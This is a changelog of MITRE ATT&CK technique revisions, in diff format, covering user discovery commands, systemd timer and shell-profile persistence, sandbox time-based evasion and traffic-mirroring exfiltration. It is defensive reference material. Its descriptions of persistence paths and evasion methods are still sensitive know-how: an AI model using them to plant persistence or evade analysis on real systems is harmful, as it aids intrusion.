>ion include <code>whoami</code>. In Mac and Linux, the curre>nformation, including <code>whoami</code>. In macOS and Linu
>ntly logged in user can be identified with <code>w</code> an>x, the currently logged in user can be identified with <code
>d <code>who</code>.>>w</code> and <code>who</code>. On macOS the <code>dscl . li
 >st /Users | grep -v '_'</code> command can also be used to e
 >numerate user accounts. Environment variables, such as <code
 >>%USERNAME%</code> and <code>$USER</code>, may also be used 
 >to access this information.

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-03-15 01:03:47.866000+00:002021-08-12 13:34:34.153000+00:00
descriptionAdversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. Utilities and commands that acquire this information include whoami. In Mac and Linux, the currently logged in user can be identified with w and who.Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. Various utilities and commands may acquire this information, including whoami. In macOS and Linux, the currently logged in user can be identified with w and who. On macOS the dscl . list /Users | grep -v '_' command can also be used to enumerate user accounts. Environment variables, such as %USERNAME% and $USER, may also be used to access this information.
x_mitre_version1.21.3

[T1007] System Service Discovery

Current version: 1.2

Version changed from: 1.1 → 1.2

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-03-15 01:05:08.805000+00:002021-10-17 14:10:36.992000+00:00
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_platformsmacOS

[T1569] System Services

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may abuse system services or daemons to execute t1Adversaries may abuse system services or daemons to execute 
>commands or programs. Adversaries can execute malicious cont>commands or programs. Adversaries can execute malicious cont
>ent by interacting with or creating services. Many services >ent by interacting with or creating services either locally 
>are set to run at boot, which can aid in achieving persisten>or remotely. Many services are set to run at boot, which can
>ce ([Create or Modify System Process](https://attack.mitre.o> aid in achieving persistence ([Create or Modify System Proc
>rg/techniques/T1543)), but adversaries can also abuse servic>ess](https://attack.mitre.org/techniques/T1543)), but advers
>es for one-time or temporary execution.>aries can also abuse services for one-time or temporary exec
 >ution.

New Mitigations:

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_remote_supportTrue
values_changed
STIX FieldOld valueNew Value
modified2020-06-08 23:28:29.250000+00:002021-10-15 18:40:23.888000+00:00
descriptionAdversaries may abuse system services or daemons to execute commands or programs. Adversaries can execute malicious content by interacting with or creating services. Many services are set to run at boot, which can aid in achieving persistence ([Create or Modify System Process](https://attack.mitre.org/techniques/T1543)), but adversaries can also abuse services for one-time or temporary execution.Adversaries may abuse system services or daemons to execute commands or programs. Adversaries can execute malicious content by interacting with or creating services either locally or remotely. Many services are set to run at boot, which can aid in achieving persistence ([Create or Modify System Process](https://attack.mitre.org/techniques/T1543)), but adversaries can also abuse services for one-time or temporary execution.
x_mitre_version1.01.1

[T1053.006] Scheduled Task/Job: Systemd Timers

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may abuse systemd timers to perform task schedult1Adversaries may abuse systemd timers to perform task schedul
>ing for initial or recurring execution of malicious code. Sy>ing for initial or recurring execution of malicious code. Sy
>stemd timers are unit files with file extension <code>.timer>stemd timers are unit files with file extension <code>.timer
></code> that control services. Timers can be set to run on a></code> that control services. Timers can be set to run on a
> calendar event or after a time span relative to a starting > calendar event or after a time span relative to a starting 
>point. They can be used as an alternative to [Cron](https://>point. They can be used as an alternative to [Cron](https://
>attack.mitre.org/techniques/T1053/003) in Linux environments>attack.mitre.org/techniques/T1053/003) in Linux environments
>.(Citation: archlinux Systemd Timers Aug 2020)  Each <code>.>.(Citation: archlinux Systemd Timers Aug 2020) Systemd timer
>timer</code> file must have a corresponding <code>.service</>s may be activated remotely via the <code>systemctl</code> c
>code> file with the same name, e.g., <code>example.timer</co>ommand line utility, which operates over [SSH](https://attac
>de> and <code>example.service</code>. <code>.service</code> >k.mitre.org/techniques/T1021/004).(Citation: Systemd Remote 
>files are [Systemd Service](https://attack.mitre.org/techniq>Control)  Each <code>.timer</code> file must have a correspo
>ues/T1543/002) unit files that are managed by the systemd sy>nding <code>.service</code> file with the same name, e.g., <
>stem and service manager.(Citation: Linux man-pages: systemd>code>example.timer</code> and <code>example.service</code>. 
> January 2014) Privileged timers are written to <code>/etc/s><code>.service</code> files are [Systemd Service](https://at
>ystemd/system/</code> and <code>/usr/lib/systemd/system</cod>tack.mitre.org/techniques/T1543/002) unit files that are man
>e> while user level are written to <code>~/.config/systemd/u>aged by the systemd system and service manager.(Citation: Li
>ser/</code>.  An adversary may use systemd timers to execute>nux man-pages: systemd January 2014) Privileged timers are w
> malicious code at system startup or on a scheduled basis fo>ritten to <code>/etc/systemd/system/</code> and <code>/usr/l
>r persistence.(Citation: Arch Linux Package Systemd Compromi>ib/systemd/system</code> while user level are written to <co
>se BleepingComputer 10JUL2018)(Citation: gist Arch package c>de>~/.config/systemd/user/</code>.  An adversary may use sys
>ompromise 10JUL2018)(Citation: acroread package compromised >temd timers to execute malicious code at system startup or o
>Arch Linux Mail 8JUL2018) Timers installed using privileged >n a scheduled basis for persistence.(Citation: Arch Linux Pa
>paths may be used to maintain root level persistence. Advers>ckage Systemd Compromise BleepingComputer 10JUL2018)(Citatio
>aries may also install user level timers to achieve user lev>n: gist Arch package compromise 10JUL2018)(Citation: acrorea
>el persistence.>d package compromised Arch Linux Mail 8JUL2018) Timers insta
 >lled using privileged paths may be used to maintain root lev
 >el persistence. Adversaries may also install user level time
 >rs to achieve user level persistence.

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_remote_supportTrue
values_changed
STIX FieldOld valueNew Value
modified2020-10-14 15:20:00.754000+00:002021-07-27 16:43:25.027000+00:00
descriptionAdversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Each .timer file must have a corresponding .service file with the same name, e.g., example.timer and example.service. .service files are [Systemd Service](https://attack.mitre.org/techniques/T1543/002) unit files that are managed by the systemd system and service manager.(Citation: Linux man-pages: systemd January 2014) Privileged timers are written to /etc/systemd/system/ and /usr/lib/systemd/system while user level are written to ~/.config/systemd/user/. An adversary may use systemd timers to execute malicious code at system startup or on a scheduled basis for persistence.(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: gist Arch package compromise 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018) Timers installed using privileged paths may be used to maintain root level persistence. Adversaries may also install user level timers to achieve user level persistence.Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the systemctl command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control) Each .timer file must have a corresponding .service file with the same name, e.g., example.timer and example.service. .service files are [Systemd Service](https://attack.mitre.org/techniques/T1543/002) unit files that are managed by the systemd system and service manager.(Citation: Linux man-pages: systemd January 2014) Privileged timers are written to /etc/systemd/system/ and /usr/lib/systemd/system while user level are written to ~/.config/systemd/user/. An adversary may use systemd timers to execute malicious code at system startup or on a scheduled basis for persistence.(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: gist Arch package compromise 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018) Timers installed using privileged paths may be used to maintain root level persistence. Adversaries may also install user level timers to achieve user level persistence.
external_references[2]['source_name']Linux man-pages: systemd January 2014Systemd Remote Control
external_references[2]['description']Linux man-pages. (2014, January). systemd(1) - Linux manual page. Retrieved April 23, 2019.Aaron Kili. (2018, January 16). How to Control Systemd Services on Remote Linux Server. Retrieved July 26, 2021.
external_references[2]['url']http://man7.org/linux/man-pages/man1/systemd.1.htmlhttps://www.tecmint.com/control-systemd-services-on-remote-linux-server/
external_references[3]['source_name']Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018Linux man-pages: systemd January 2014
external_references[3]['description']Catalin Cimpanu. (2018, July 10). Malware Found in Arch Linux AUR Package Repository. Retrieved April 23, 2019.Linux man-pages. (2014, January). systemd(1) - Linux manual page. Retrieved April 23, 2019.
external_references[3]['url']https://www.bleepingcomputer.com/news/security/malware-found-in-arch-linux-aur-package-repository/http://man7.org/linux/man-pages/man1/systemd.1.html
external_references[4]['source_name']gist Arch package compromise 10JUL2018Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018
external_references[4]['description']Catalin Cimpanu. (2018, July 10). ~x file downloaded in public Arch package compromise. Retrieved April 23, 2019.Catalin Cimpanu. (2018, July 10). Malware Found in Arch Linux AUR Package Repository. Retrieved April 23, 2019.
external_references[4]['url']https://gist.github.com/campuscodi/74d0d2e35d8fd9499c76333ce027345ahttps://www.bleepingcomputer.com/news/security/malware-found-in-arch-linux-aur-package-repository/
external_references[5]['source_name']acroread package compromised Arch Linux Mail 8JUL2018gist Arch package compromise 10JUL2018
external_references[5]['description']Eli Schwartz. (2018, June 8). acroread package compromised. Retrieved April 23, 2019.Catalin Cimpanu. (2018, July 10). ~x file downloaded in public Arch package compromise. Retrieved April 23, 2019.
external_references[5]['url']https://lists.archlinux.org/pipermail/aur-general/2018-July/034153.htmlhttps://gist.github.com/campuscodi/74d0d2e35d8fd9499c76333ce027345a
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'acroread package compromised Arch Linux Mail 8JUL2018', 'description': 'Eli Schwartz. (2018, June 8). acroread package compromised. Retrieved April 23, 2019.', 'url': 'https://lists.archlinux.org/pipermail/aur-general/2018-July/034153.html'}

[T1080] Taint Shared Content

Current version: 1.3

Version changed from: 1.2 → 1.3

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-03-31 22:14:56.107000+00:002021-10-17 14:12:33.188000+00:00
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_platformsOffice 365
x_mitre_platformsSaaS
x_mitre_platformsLinux
x_mitre_platformsmacOS

[T1055.003] Process Injection: Thread Execution Hijacking

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-11-10 18:29:30.941000+00:002021-10-18 12:22:50.800000+00:00
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Modification

[T1055.005] Process Injection: Thread Local Storage

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-11-10 18:29:30.984000+00:002021-10-18 12:24:54.198000+00:00
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Modification

[T1497.003] Virtualization/Sandbox Evasion: Time Based Evasion

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may employ various time-based methods to detect t1Adversaries may employ various time-based methods to detect 
>and avoid virtualization and analysis environments. This may>and avoid virtualization and analysis environments. This may
> include enumerating time-based properties, such as uptime o> include enumerating time-based properties, such as uptime o
>r the system clock, as well as the use of timers or other tr>r the system clock, as well as the use of timers or other tr
>iggers to avoid a virtual machine environment (VME) or sandb>iggers to avoid a virtual machine environment (VME) or sandb
>ox, specifically those that are automated or only operate fo>ox, specifically those that are automated or only operate fo
>r a limited amount of time.  Adversaries may employ various >r a limited amount of time.  Adversaries may employ various 
>time-based evasions, such as delaying malware functionality >time-based evasions, such as delaying malware functionality 
>upon initial execution using programmatic sleep commands or >upon initial execution using programmatic sleep commands or 
>native system scheduling functionality (ex: [Scheduled Task/>native system scheduling functionality (ex: [Scheduled Task/
>Job](https://attack.mitre.org/techniques/T1053)). Delays may>Job](https://attack.mitre.org/techniques/T1053)). Delays may
> also be based on waiting for specific victim conditions to > also be based on waiting for specific victim conditions to 
>be met (ex: system time, events, etc.) or employ scheduled [>be met (ex: system time, events, etc.) or employ scheduled [
>Multi-Stage Channels](https://attack.mitre.org/techniques/T1>Multi-Stage Channels](https://attack.mitre.org/techniques/T1
>104) to avoid analysis and scrutiny.  Adversaries may also u>104) to avoid analysis and scrutiny.(Citation: Deloitte Envi
>se time as a metric to detect sandboxes and analysis environ>ronment Awareness)  Benign commands or other operations may 
>ments, particularly those that attempt to manipulate time me>also be used to delay malware execution. Loops or otherwise 
>chanisms to simulate longer elapses of time. For example, an>needless repetitions of commands, such as [Ping](https://att
> adversary may be able to identify a sandbox accelerating ti>ack.mitre.org/software/S0097)s, may be used to delay malware
>me by sampling and calculating the expected value for an env> execution and potentially exceed time thresholds of automat
>ironment's timestamp before and after execution of a sleep f>ed analysis environments.(Citation: Revil Independence Day)(
>unction.(Citation: ISACA Malware Tricks)>Citation: Netskope Nitol) Another variation, commonly referr
 >ed to as API hammering, involves making various calls to [Na
 >tive API](https://attack.mitre.org/techniques/T1106) functio
 >ns in order to delay execution (while also potentially overl
 >oading analysis environments with junk data).(Citation: Joe 
 >Sec Nymaim)(Citation: Joe Sec Trickbot)  Adversaries may als
 >o use time as a metric to detect sandboxes and analysis envi
 >ronments, particularly those that attempt to manipulate time
 > mechanisms to simulate longer elapses of time. For example,
 > an adversary may be able to identify a sandbox accelerating
 > time by sampling and calculating the expected value for an 
 >environment's timestamp before and after execution of a slee
 >p function.(Citation: ISACA Malware Tricks)

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-01 15:48:28.345000+00:002021-10-15 22:37:43.854000+00:00
descriptionAdversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time. Adversaries may employ various time-based evasions, such as delaying malware functionality upon initial execution using programmatic sleep commands or native system scheduling functionality (ex: [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)). Delays may also be based on waiting for specific victim conditions to be met (ex: system time, events, etc.) or employ scheduled [Multi-Stage Channels](https://attack.mitre.org/techniques/T1104) to avoid analysis and scrutiny. Adversaries may also use time as a metric to detect sandboxes and analysis environments, particularly those that attempt to manipulate time mechanisms to simulate longer elapses of time. For example, an adversary may be able to identify a sandbox accelerating time by sampling and calculating the expected value for an environment's timestamp before and after execution of a sleep function.(Citation: ISACA Malware Tricks)Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time. Adversaries may employ various time-based evasions, such as delaying malware functionality upon initial execution using programmatic sleep commands or native system scheduling functionality (ex: [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)). Delays may also be based on waiting for specific victim conditions to be met (ex: system time, events, etc.) or employ scheduled [Multi-Stage Channels](https://attack.mitre.org/techniques/T1104) to avoid analysis and scrutiny.(Citation: Deloitte Environment Awareness) Benign commands or other operations may also be used to delay malware execution. Loops or otherwise needless repetitions of commands, such as [Ping](https://attack.mitre.org/software/S0097)s, may be used to delay malware execution and potentially exceed time thresholds of automated analysis environments.(Citation: Revil Independence Day)(Citation: Netskope Nitol) Another variation, commonly referred to as API hammering, involves making various calls to [Native API](https://attack.mitre.org/techniques/T1106) functions in order to delay execution (while also potentially overloading analysis environments with junk data).(Citation: Joe Sec Nymaim)(Citation: Joe Sec Trickbot) Adversaries may also use time as a metric to detect sandboxes and analysis environments, particularly those that attempt to manipulate time mechanisms to simulate longer elapses of time. For example, an adversary may be able to identify a sandbox accelerating time by sampling and calculating the expected value for an environment's timestamp before and after execution of a sleep function.(Citation: ISACA Malware Tricks)
external_references[1]['source_name']ISACA Malware TricksDeloitte Environment Awareness
external_references[1]['description']Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved May 18, 2021.
external_references[1]['url']https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxeshttps://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Revil Independence Day', 'description': 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses supply chain exploit to attack hundreds of businesses. Retrieved September 30, 2021.', 'url': 'https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/'}
external_references{'source_name': 'Netskope Nitol', 'description': 'Malik, A. (2016, October 14). Nitol Botnet makes a resurgence with evasive sandbox analysis technique. Retrieved September 30, 2021.', 'url': 'https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique'}
external_references{'source_name': 'Joe Sec Nymaim', 'description': 'Joe Security. (2016, April 21). Nymaim - evading Sandboxes with API hammering. Retrieved September 30, 2021.', 'url': 'https://www.joesecurity.org/blog/3660886847485093803'}
external_references{'source_name': 'Joe Sec Trickbot', 'description': "Joe Security. (2020, July 13). TrickBot's new API-Hammering explained. Retrieved September 30, 2021.", 'url': 'https://www.joesecurity.org/blog/498839998833561473'}
external_references{'source_name': 'ISACA Malware Tricks', 'description': 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.', 'url': 'https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes'}
x_mitre_contributorsJorge Orchilles, SCYTHE
x_mitre_contributorsRuben Dodge, @shotgunner101
x_mitre_contributorsJeff Felling, Red Canary

[T1588.002] Obtain Capabilities: Tool

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_contributors['SOCCRATES', 'Mnemonic AS']
x_mitre_data_sources['Malware Repository: Malware Metadata']
values_changed
STIX FieldOld valueNew Value
modified2021-04-15 03:15:20.491000+00:002021-10-17 16:17:55.499000+00:00
x_mitre_detectionMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.In some cases, malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020) Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Analyzing CS Dec 2020', 'description': 'Maynier, E. (2020, December 20). Analyzing Cobalt Strike for Fun and Profit. Retrieved October 12, 2021.', 'url': 'https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/'}

[T1020.001] Automated Exfiltration: Traffic Duplication

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may leverage traffic mirroring in order to automt1Adversaries may leverage traffic mirroring in order to autom
>ate data exfiltration over compromised network infrastructur>ate data exfiltration over compromised network infrastructur
>e.  Traffic mirroring is a native feature for some network d>e.  Traffic mirroring is a native feature for some network d
>evices and used for network analysis and may be configured t>evices and used for network analysis and may be configured t
>o duplicate traffic and forward to one or more destinations >o duplicate traffic and forward to one or more destinations 
>for analysis by a network analyzer or other monitoring devic>for analysis by a network analyzer or other monitoring devic
>e. (Citation: Cisco Traffic Mirroring) (Citation: Juniper Tr>e. (Citation: Cisco Traffic Mirroring) (Citation: Juniper Tr
>affic Mirroring)  Adversaries may abuse traffic mirroring to>affic Mirroring)  Adversaries may abuse traffic mirroring to
> mirror or redirect network traffic through other network in> mirror or redirect network traffic through other network in
>frastructure they control. Malicious modifications to networ>frastructure they control. Malicious modifications to networ
>k devices to enable traffic redirection may be possible thro>k devices to enable traffic redirection may be possible thro
>ugh [ROMMONkit](https://attack.mitre.org/techniques/T1542/00>ugh [ROMMONkit](https://attack.mitre.org/techniques/T1542/00
>4) or [Patch System Image](https://attack.mitre.org/techniqu>4) or [Patch System Image](https://attack.mitre.org/techniqu
>es/T1601/001).(Citation: US-CERT-TA18-106A)(Citation: Cisco >es/T1601/001).(Citation: US-CERT-TA18-106A)(Citation: Cisco 
>Blog Legacy Device Attacks) Adversaries may use traffic dupl>Blog Legacy Device Attacks) Adversaries may use traffic dupl
>ication in conjunction with [Network Sniffing](https://attac>ication in conjunction with [Network Sniffing](https://attac
>k.mitre.org/techniques/T1040), [Input Capture](https://attac>k.mitre.org/techniques/T1040), [Input Capture](https://attac
>k.mitre.org/techniques/T1056), or [Man-in-the-Middle](https:>k.mitre.org/techniques/T1056), or [Adversary-in-the-Middle](
>//attack.mitre.org/techniques/T1557) depending on the goals >https://attack.mitre.org/techniques/T1557) depending on the 
>and objectives of the adversary.>goals and objectives of the adversary.

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-10-22 02:24:54.640000+00:002021-08-16 15:23:37.640000+00:00
descriptionAdversaries may leverage traffic mirroring in order to automate data exfiltration over compromised network infrastructure. Traffic mirroring is a native feature for some network devices and used for network analysis and may be configured to duplicate traffic and forward to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring) (Citation: Juniper Traffic Mirroring) Adversaries may abuse traffic mirroring to mirror or redirect network traffic through other network infrastructure they control. Malicious modifications to network devices to enable traffic redirection may be possible through [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) or [Patch System Image](https://attack.mitre.org/techniques/T1601/001).(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks) Adversaries may use traffic duplication in conjunction with [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Input Capture](https://attack.mitre.org/techniques/T1056), or [Man-in-the-Middle](https://attack.mitre.org/techniques/T1557) depending on the goals and objectives of the adversary.Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised network infrastructure. Traffic mirroring is a native feature for some network devices and used for network analysis and may be configured to duplicate traffic and forward to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring) (Citation: Juniper Traffic Mirroring) Adversaries may abuse traffic mirroring to mirror or redirect network traffic through other network infrastructure they control. Malicious modifications to network devices to enable traffic redirection may be possible through [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) or [Patch System Image](https://attack.mitre.org/techniques/T1601/001).(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks) Adversaries may use traffic duplication in conjunction with [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Input Capture](https://attack.mitre.org/techniques/T1056), or [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) depending on the goals and objectives of the adversary.
x_mitre_version1.01.1

[T1059.004] Command and Scripting Interpreter: Unix Shell

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_remote_supportTrue
values_changed
STIX FieldOld valueNew Value
modified2020-06-15 16:55:44.483000+00:002021-07-26 22:34:43.261000+00:00
x_mitre_version1.01.1

[T1546.004] Event Triggered Execution: Unix Shell Configuration Modification

Current version: 2.1

Version changed from: 2.0 → 2.1


Old Description
New Description
t1Adversaries may establish persistence through executing malit1Adversaries may establish persistence through executing mali
>cious commands triggered by a user’s shell. User [Unix Shell>cious commands triggered by a user’s shell. User [Unix Shell
>](https://attack.mitre.org/techniques/T1059/004)s execute se>](https://attack.mitre.org/techniques/T1059/004)s execute se
>veral configuration scripts at different points throughout t>veral configuration scripts at different points throughout t
>he session based on events. For example, when a user opens a>he session based on events. For example, when a user opens a
> command-line interface or remotely logs in (such as via SSH> command-line interface or remotely logs in (such as via SSH
>) a login shell is initiated. The login shell executes scrip>) a login shell is initiated. The login shell executes scrip
>ts from the system (<code>/etc</code>) and the user’s home d>ts from the system (<code>/etc</code>) and the user’s home d
>irectory (<code>~/</code>) to configure the environment. All>irectory (<code>~/</code>) to configure the environment. All
> login shells on a system use /etc/profile when initiated. T> login shells on a system use /etc/profile when initiated. T
>hese configuration scripts run at the permission level of th>hese configuration scripts run at the permission level of th
>eir directory and are often used to set environment variable>eir directory and are often used to set environment variable
>s, create aliases, and customize the user’s environment. Whe>s, create aliases, and customize the user’s environment. Whe
>n the shell exits or terminates, additional shell scripts ar>n the shell exits or terminates, additional shell scripts ar
>e executed to ensure the shell exits appropriately.   Advers>e executed to ensure the shell exits appropriately.   Advers
>aries may attempt to establish persistence by inserting comm>aries may attempt to establish persistence by inserting comm
>ands into scripts automatically executed by shells. Using ba>ands into scripts automatically executed by shells. Using ba
>sh as an example, the default shell for most GNU/Linux syste>sh as an example, the default shell for most GNU/Linux syste
>ms, adversaries may add commands that launch malicious binar>ms, adversaries may add commands that launch malicious binar
>ies into the <code>/etc/profile</code> and <code>/etc/profil>ies into the <code>/etc/profile</code> and <code>/etc/profil
>e.d</code> files.(Citation: intezer-kaiji-malware)(Citation:>e.d</code> files.(Citation: intezer-kaiji-malware)(Citation:
> bencane blog bashrc) These files typically require root per> bencane blog bashrc) These files typically require root per
>missions to modify and are executed each time any shell on a>missions to modify and are executed each time any shell on a
> system launches. For user level permissions, adversaries ca> system launches. For user level permissions, adversaries ca
>n insert malicious commands into <code>~/.bash_profile</code>n insert malicious commands into <code>~/.bash_profile</code
>>, <code>~/.bash_login</code>, or <code>~/.profile</code> wh>>, <code>~/.bash_login</code>, or <code>~/.profile</code> wh
>ich are sourced when a user opens a command-line interface o>ich are sourced when a user opens a command-line interface o
>r connects remotely.(Citation: anomali-rocke-tactics)(Citati>r connects remotely.(Citation: anomali-rocke-tactics)(Citati
>on: Linux manual bash invocation) Since the system only exec>on: Linux manual bash invocation) Since the system only exec
>utes the first existing file in the listed order, adversarie>utes the first existing file in the listed order, adversarie
>s have used <code>~/.bash_profile</code> to ensure execution>s have used <code>~/.bash_profile</code> to ensure execution
>. Adversaries have also leveraged the <code>~/.bashrc</code>>. Adversaries have also leveraged the <code>~/.bashrc</code>
> file which is additionally executed if the connection is es> file which is additionally executed if the connection is es
>tablished remotely or an additional interactive shell is ope>tablished remotely or an additional interactive shell is ope
>ned, such as a new tab in the command-line interface.(Citati>ned, such as a new tab in the command-line interface.(Citati
>on: Tsunami)(Citation: anomali-rocke-tactics)(Citation: anom>on: Tsunami)(Citation: anomali-rocke-tactics)(Citation: anom
>ali-linux-rabbit)(Citation: Magento) Some malware targets th>ali-linux-rabbit)(Citation: Magento) Some malware targets th
>e termination of a program to trigger execution, adversaries>e termination of a program to trigger execution, adversaries
> can use the <code>~/.bash_logout</code> file to execute mal> can use the <code>~/.bash_logout</code> file to execute mal
>icious commands at the end of a session.   For macOS, the fu>icious commands at the end of a session.   For macOS, the fu
>nctionality of this technique is similar but may leverage zs>nctionality of this technique is similar but may leverage zs
>h, the default shell for macOS 10.15+. When the Terminal.app>h, the default shell for macOS 10.15+. When the Terminal.app
> is opened, the application launches a zsh login shell and a> is opened, the application launches a zsh login shell and a
> zsh interactive shell. The login shell configures the syste> zsh interactive shell. The login shell configures the syste
>m environment using <code>/etc/profile</code>, <code>/etc/zs>m environment using <code>/etc/profile</code>, <code>/etc/zs
>henv</code>, <code>/etc/zprofile</code>, and <code>/etc/zlog>henv</code>, <code>/etc/zprofile</code>, and <code>/etc/zlog
>in</code>.(Citation: ScriptingOSX zsh)(Citation: PersistentJ>in</code>.(Citation: ScriptingOSX zsh)(Citation: PersistentJ
>XA_leopitt)(Citation: code_persistence_zsh) The login shell >XA_leopitt)(Citation: code_persistence_zsh)(Citation: macOS 
>then configures the user environment with <code>~/.zprofile<>MS office sandbox escape) The login shell then configures th
>/code> and <code>~/.zlogin</code>. The interactive shell use>e user environment with <code>~/.zprofile</code> and <code>~
>s the <code>~/.zshrc</code> to configure the user environmen>/.zlogin</code>. The interactive shell uses the <code>~/.zsh
>t. Upon exiting, <code>/etc/zlogout</code> and <code>~/.zlog>rc</code> to configure the user environment. Upon exiting, <
>out</code> are executed. For legacy programs, macOS executes>code>/etc/zlogout</code> and <code>~/.zlogout</code> are exe
> <code>/etc/bashrc</code> on startup.>cuted. For legacy programs, macOS executes <code>/etc/bashrc
 ></code> on startup.

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-03-08 15:22:54.089000+00:002021-08-20 18:01:52.120000+00:00
